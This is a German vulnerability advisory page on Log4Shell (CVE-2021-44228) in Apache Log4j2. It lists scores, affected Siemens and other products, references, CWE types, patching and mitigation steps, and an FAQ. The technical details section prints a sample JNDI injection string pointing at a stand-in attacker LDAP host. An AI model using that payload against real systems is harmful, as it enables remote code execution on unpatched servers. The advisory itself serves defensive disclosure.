CVE-2021-44228
Apache Log4j2 Remote Code Execution Vulnerability
Beschreibung
CVE-2021-44228, auch bekannt als Log4Shell, ist eine kritische Expression Language Injection-Schwachstelle in Apache Log4j2. Die Schwachstelle betrifft die JNDI-Funktionalität in Log4j2 Versionen 2.0-beta9 bis 2.15.0 und ermöglicht es einem Angreifer ohne Authentifizierung, über manipulierte Log-Nachrichten beliebigen Code von einem angreifergesteuerten LDAP-Server zu laden und auszuführen. Mit dem maximal möglichen CVSS 3.1-Score von 10.0 (CRITICAL) stellt CVE-2021-44228 eine der schwerwiegendsten Schwachstellen der letzten Jahrzehnte dar. CISA hat die aktive Ausnutzung bestätigt und diese Log4j2-Schwachstelle ist bekannt für den Einsatz in Ransomware-Kampagnen. Der EPSS-Score von 94,36 % (99,96. Perzentile) bestätigt die massive Ausnutzung in der Praxis.
KEV-Informationen
CVSS-Score
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:HIm Rechner öffnenCWEs
Betroffene Produkte
| Hersteller | Produkt | Version |
|---|---|---|
| siemens | 6bk1602-0aa12-0tp0 firmware | < 2.7.0 |
| siemens | 6bk1602-0aa22-0tp0 firmware | < 2.7.0 |
| siemens | 6bk1602-0aa32-0tp0 firmware | < 2.7.0 |
| siemens | 6bk1602-0aa42-0tp0 firmware | < 2.7.0 |
| siemens | 6bk1602-0aa52-0tp0 firmware | < 2.7.0 |
| apache | log4j | >= 2.0.1, < 2.3.1; >= 2.4.0, < 2.12.2; >= 2.13.0, < 2.15.0; 2.0 |
| siemens | sppa-t3000 ses3000 firmware | Alle Versionen |
| siemens | capital | < 2019.1; 2019.1 |
| siemens | comos | < 10.4.2 |
| siemens | desigo cc advanced reports | 3.0; 4.0; 4.1; 4.2; 5.0; 5.1 |
| siemens | desigo cc info center | 5.0; 5.1 |
| siemens | e-car operation center | < 2021-12-13 |
| siemens | energy engage | 3.1 |
| siemens | energyip | 8.5; 8.6; 8.7; 9.0 |
| siemens | energyip prepay | < 3.8.0.12 |
| siemens | gma-manager | < 8.6.2j-398 |
| siemens | head-end system universal device integration system | Alle Versionen |
| siemens | industrial edge management | Alle Versionen |
| siemens | industrial edge management hub | < 2021-12-13 |
| siemens | logo\! soft comfort | Alle Versionen |
Mehrere CVSS-Bewertungen
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Referenzen
- http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html(Third Party Advisory, VDB Entry)
- http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html(Third Party Advisory, VDB Entry)
- http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html(Exploit, Third Party Advisory, VDB Entry)
- http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html(Exploit, Third Party Advisory, VDB Entry)
- http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html(Third Party Advisory, VDB Entry)
- http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html(Third Party Advisory, VDB Entry)
- http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html(Third Party Advisory, VDB Entry)
- http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html(Third Party Advisory, VDB Entry)
- http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html(Broken Link, Third Party Advisory, VDB Entry)
- http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html(Exploit, Third Party Advisory, VDB Entry)
- http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html(Exploit, Third Party Advisory, VDB Entry)
- http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html(Exploit, Third Party Advisory, VDB Entry)
- http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html(Exploit, Third Party Advisory, VDB Entry)
- http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html(Third Party Advisory, VDB Entry)
- http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html(Exploit, Third Party Advisory, VDB Entry)
- http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.html(Third Party Advisory, VDB Entry)
- http://seclists.org/fulldisclosure/2022/Dec/2(Exploit, Mailing List, Third Party Advisory)
- http://seclists.org/fulldisclosure/2022/Jul/11(Mailing List, Third Party Advisory)
- http://seclists.org/fulldisclosure/2022/Mar/23(Mailing List, Third Party Advisory)
- http://www.openwall.com/lists/oss-security/2021/12/10/1(Mailing List, Mitigation, Third Party Advisory)
- http://www.openwall.com/lists/oss-security/2021/12/10/2(Mailing List, Mitigation, Third Party Advisory)
- http://www.openwall.com/lists/oss-security/2021/12/10/3(Mailing List, Third Party Advisory)
- http://www.openwall.com/lists/oss-security/2021/12/13/1(Mailing List, Third Party Advisory)
- http://www.openwall.com/lists/oss-security/2021/12/13/2(Mailing List, Third Party Advisory)
- http://www.openwall.com/lists/oss-security/2021/12/14/4(Mailing List, Third Party Advisory)
- http://www.openwall.com/lists/oss-security/2021/12/15/3(Mailing List, Third Party Advisory)
- https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf(Third Party Advisory)
- https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf(Third Party Advisory)
- https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf(Third Party Advisory)
- https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf(Third Party Advisory)
- https://github.com/cisagov/log4j-affected-db(Third Party Advisory)
- https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md(Broken Link, Product, US Government Resource)
- https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228(Exploit, Third Party Advisory)
- https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html(Mailing List, Third Party Advisory)
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/(Release Notes)
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/(Release Notes)
- https://logging.apache.org/log4j/2.x/security.html(Release Notes, Vendor Advisory)
- https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/(Patch, Third Party Advisory, Vendor Advisory)
- https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032(Third Party Advisory)
- https://security.netapp.com/advisory/ntap-20211210-0007/(Third Party Advisory)
- https://support.apple.com/kb/HT213189(Third Party Advisory)
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd(Third Party Advisory)
- https://twitter.com/kurtseifried/status/1469345530182455296(Broken Link, Exploit, Third Party Advisory)
- https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001(Third Party Advisory)
- https://www.debian.org/security/2021/dsa-5020(Mailing List, Third Party Advisory)
- https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html(Third Party Advisory)
- https://www.kb.cert.org/vuls/id/930724(Third Party Advisory, US Government Resource)
- https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html(Exploit, Third Party Advisory)
- https://www.oracle.com/security-alerts/alert-cve-2021-44228.html(Third Party Advisory)
- https://www.oracle.com/security-alerts/cpuapr2022.html(Patch, Third Party Advisory)
- https://www.oracle.com/security-alerts/cpujan2022.html(Patch, Third Party Advisory)
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-44228(Third Party Advisory, US Government Resource)
Schwachstellentyp
CWE-917: Unsachgemäße Neutralisierung spezieller Elemente in einer Expression-Language-Anweisung ('Expression Language Injection')
Expression Language Injection tritt auf, wenn Software EL-Anweisungen unter Verwendung extern beeinflusster Eingaben konstruiert, ohne spezielle Elemente zu neutralisieren. In Apache Log4j2 wird die JNDI-Lookup-Funktionalität (${jndi:ldap://...}) in Log-Nachrichten ausgewertet, wodurch Angreifer über manipulierte Eingaben Remote Code Execution erreichen können. Diese Schwachstelle ist besonders gefährlich, da scheinbar harmlose Log-Nachrichten die Codeausführung auslösen.
Weitere Informationen: CWE-917 — Unsachgemäße Neutralisierung spezieller Elemente in einer Expression-Language-Anweisung ('Expression Language Injection')
CWE-502: Deserialisierung nicht vertrauenswürdiger Daten
Deserialisierung nicht vertrauenswürdiger Daten tritt auf, wenn eine Anwendung Daten aus nicht vertrauenswürdigen Quellen deserialisiert. Bei Log4Shell lädt Log4j2 über JNDI-Lookups Java-Klassen von angreifergesteuerten LDAP-Servern, die bei der Instanziierung beliebigen Code ausführen können.
Weitere Informationen: CWE-502 — Deserialisierung nicht vertrauenswürdiger Daten
CWE-400: Unkontrollierter Ressourcenverbrauch
Unkontrollierter Ressourcenverbrauch ermöglicht es Angreifern, Systemressourcen zu erschöpfen. Die JNDI-Lookup-Funktionalität in Log4j2 kann für DNS-basierte Exfiltration und Denial-of-Service-Angriffe missbraucht werden.
Weitere Informationen: CWE-400 — Unkontrollierter Ressourcenverbrauch
CWE-20: Unsachgemäße Eingabevalidierung
Unsachgemäße Eingabevalidierung liegt zugrunde, wenn Log4j2 Log-Nachrichten mit eingebetteten JNDI-Lookups verarbeitet, ohne die Eingaben auf bösartige Inhalte zu prüfen.
Weitere Informationen: CWE-20 — Unsachgemäße Eingabevalidierung
Auswirkungsanalyse
CVE-2021-44228 hat den maximal möglichen CVSS 3.1-Score von 10.0 (CRITICAL) und stellt eine beispiellose Bedrohung für die globale IT-Infrastruktur dar. Die Schwachstelle ist über das Netzwerk ausnutzbar (Attack Vector: NETWORK) bei geringer Angriffskomplexität (Attack Complexity: LOW), erfordert keine Authentifizierung (Privileges Required: NONE) und keine Benutzerinteraktion (User Interaction: NONE). Der erweiterte Geltungsbereich (Scope: CHANGED) bedeutet, dass die Kompromittierung weit über die Log4j2-Bibliothek hinaus auf das gesamte System übergreifen kann. Vertraulichkeit (High): Vollständiger Zugriff auf alle Daten des kompromittierten Systems. Integrität (High): Beliebige Codeausführung ermöglicht jede Form von Datenmanipulation. Verfügbarkeit (High): Systeme können vollständig funktionsunfähig gemacht oder für Ransomware-Angriffe genutzt werden. Die Kombination aus bekanntem Ransomware-Einsatz, maximaler CVSS-Bewertung und dem EPSS-Score von 94,36 % macht diese Schwachstelle zur höchsten Priorität für jede Organisation.
Exploit-Reifegrad
Umfangreicher öffentlicher Exploit-Code ist verfügbar für CVE-2021-44228 über zahlreiche Quellen, darunter Packet Storm Security mit vollständigen Remote Code Execution-Exploits, VMware vCenter-spezifische Exploits, UniFi-spezifische Exploits und MobileIron-Exploits. CISA hat die aktive Ausnutzung bestätigt und Log4Shell ist bekannt für den Einsatz in Ransomware-Kampagnen. Die Behebungsfrist wurde auf den extrem kurzen Zeitraum bis 2021-12-24 gesetzt. Der EPSS-Score von 94,36 % (99,96. Perzentile) bestätigt die massive, weltweite Ausnutzung. Log4Shell wurde innerhalb von Stunden nach der Veröffentlichung massenhaft ausgenutzt und bleibt eine der am häufigsten angegriffenen Schwachstellen.
Behebung
- Pflichtmaßnahme laut CISA KEV: Für alle betroffenen Software-Assets, für die Updates existieren, sind die einzigen akzeptablen Maßnahmen: 1) Updates anwenden; ODER 2) betroffene Assets aus dem Netzwerk entfernen. Temporäre Mitigationen sind nur akzeptabel, bis Updates verfügbar sind.
- Aktualisieren Sie Apache Log4j2 auf Version 2.17.1 oder höher (bzw. 2.12.4 für Java 7 oder 2.3.2 für Java 6). Beachten Sie, dass Versionen 2.15.0 und 2.16.0 weitere Schwachstellen enthielten und nicht ausreichend sind. Prüfen Sie alle Anwendungen, die Log4j2 als Abhängigkeit nutzen, einschließlich Siemens-Produkte und andere Drittanbieter-Software.
- Falls ein sofortiges Update nicht möglich ist, entfernen Sie die JndiLookup-Klasse aus dem Classpath:
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class. Setzen Sie alternativ die Systemeigenschaftlog4j2.formatMsgNoLookups=true(nur für Versionen >= 2.10). - Implementieren Sie Netzwerksegmentierung, um ausgehende LDAP/RMI-Verbindungen von Anwendungsservern zu blockieren. Überwachen Sie DNS-Anfragen und Netzwerkverkehr auf Exfiltrationsversuche und verdächtige JNDI-Lookup-Muster.
- Führen Sie eine umfassende Inventarisierung aller Log4j2-Installationen in Ihrer Umgebung durch, einschließlich transitiver Abhängigkeiten in Java-Anwendungen. Implementieren Sie langfristig Software Composition Analysis (SCA), um Schwachstellen in Abhängigkeiten frühzeitig zu erkennen.
Technische Details
CVE-2021-44228 betrifft Apache Log4j2 Versionen 2.0-beta9 bis 2.15.0 (ausgenommen Sicherheitsreleases 2.12.2, 2.12.3 und 2.3.1). Die Schwachstelle liegt in der JNDI-Lookup-Funktionalität, die in Konfigurationen, Log-Nachrichten und Parametern verwendet wird. Wenn eine Anwendung eine Zeichenkette wie ${jndi:ldap://attacker.com/exploit} loggt, löst Log4j2 einen JNDI-Lookup gegen den angegebenen LDAP-Server aus, lädt die zurückgegebene Java-Klasse und instanziiert sie, was zur Ausführung von beliebigem Code führt. Der CVSS-Vektor CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H spiegelt die maximale Ausnutzbarkeit wider: netzwerkbasiert, trivial in der Durchführung, ohne Authentifizierung oder Benutzerinteraktion, mit erweitertem Scope. Die Kombination aus CWE-917 (Expression Language Injection), CWE-502 (Deserialisierung), CWE-400 (Ressourcenverbrauch) und CWE-20 (Eingabevalidierung) verdeutlicht die mehrschichtige Natur des Problems.
Häufig gestellte Fragen
Wird CVE-2021-44228 aktiv ausgenutzt?
Ja. CVE-2021-44228 (Log4Shell) wird massiv und weltweit aktiv ausgenutzt. CISA hat die Schwachstelle in den Known Exploited Vulnerabilities-Katalog aufgenommen und ihre Ausnutzung in Ransomware-Kampagnen bestätigt. Der EPSS-Score von 94,36 % (99,96. Perzentile) bestätigt die anhaltend massive Ausnutzung.
Welche Produkte sind von CVE-2021-44228 betroffen?
CVE-2021-44228 betrifft Apache Log4j2 in den Versionen 2.0-beta9 bis 2.15.0 (ausgenommen 2.12.2, 2.12.3 und 2.3.1). Da Log4j2 eine der am weitesten verbreiteten Java-Logging-Bibliotheken ist, sind zahlreiche Produkte betroffen, darunter Apache-Produkte, Siemens-Industriesteuerungen, VMware, Cisco und viele weitere.
Wie behebe ich CVE-2021-44228?
Aktualisieren Sie Log4j2 auf Version 2.17.1 oder höher. Falls ein sofortiges Update nicht möglich ist, entfernen Sie die JndiLookup-Klasse aus dem Classpath oder setzen Sie log4j2.formatMsgNoLookups=true. Blockieren Sie ausgehende LDAP/RMI-Verbindungen auf Netzwerkebene.
Wie schwerwiegend ist CVE-2021-44228?
CVE-2021-44228 hat den maximal möglichen CVSS 3.1-Score von 10.0 (CRITICAL) und wird allgemein als eine der schwerwiegendsten Schwachstellen der IT-Geschichte angesehen. Die triviale Ausnutzbarkeit, die massive Verbreitung von Log4j2 und der bestätigte Einsatz in Ransomware-Kampagnen machen diese Schwachstelle zur höchsten Priorität.
Hilfe beim Schwachstellenmanagement?
Unsere Sicherheitsexperten helfen Ihnen bei der Priorisierung und Behebung von Schwachstellen.